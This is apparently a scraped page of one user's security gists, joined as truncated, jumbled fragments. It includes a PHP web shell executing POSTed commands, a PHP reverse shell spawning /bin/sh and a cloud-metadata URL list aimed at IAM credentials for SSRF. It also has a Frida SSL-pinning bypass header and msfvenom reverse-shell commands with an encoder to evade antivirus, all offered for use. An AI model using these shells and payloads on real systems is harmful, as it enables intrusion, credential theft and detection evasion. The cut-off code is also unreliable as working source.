Naveen Jagadeesan thevillagehacker

<?php
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<!-- By Artyum (https://github.com/artyuum) -->
<head>
<meta charset="utf-8">
@thevillagehacker
thevillagehacker / cloud_metadata.txt
Created April 16, 2021 06:27 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
/*
Android SSL Re-pinning frida script v0.2 030417-pier
$ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt
$ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause
https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/
UPDATE 20191605: Fixed undeclared var. Thanks to @oleavr and @ehsanpc9999 !
*/
@thevillagehacker
thevillagehacker / Metasploit-cheatsheet.md
Created February 26, 2021 08:48
Metasploit cheatsheet

Metasploit Reverse Shell CheatSheet

Msfvenom: 
msfvenom -p windows/shell_reverse_tcp LHOST=<your ip> LPORT=<your port> -f exe -o shell_reverse.exe

To avoid AV detection, use an encoder

msfvenom -p windows/shell_reverse_tcp LHOST=<your ip> LPORT=<your port> -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
# Reset
Color_Off="\[\033[0m\]" # Text Reset
# Regular Colors
Black="\[\033[0;30m\]" # Black
Red="\[\033[0;31m\]" # Red
Green="\[\033[0;32m\]" # Green
Yellow="\[\033[0;33m\]" # Yellow
Blue="\[\033[0;34m\]" # Blue
Purple="\[\033[0;35m\]" # Purple
<?php
function featureShell($cmd, $cwd) {
$stdout = array();
if (preg_match("/^\s*cd\s*$/", $cmd)) {
// pass
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
chdir($cwd);
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = 'IP'; // CHANGE THIS
$port = PORT; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
sound/pci/cs46xx/imgs/cwcdma.asp
sites/all/libraries/ckeditor/ckeditor.asp
sites/all/libraries/ckeditor/_samples/asp/events.asp
sites/all/libraries/ckeditor/_samples/asp/sample_posteddata.asp
sites/all/libraries/ckeditor/_samples/asp/standalone.asp
sites/all/libraries/ckeditor/_samples/asp/replaceall.asp
sites/all/libraries/ckeditor/_samples/asp/advanced.asp
sites/all/libraries/ckeditor/_samples/asp/replace.asp
src/main/webapp/static/my97datepicker/docs/demo/resource/main.asp
library/custom_template/ckeditor/_samples/asp/replaceall.asp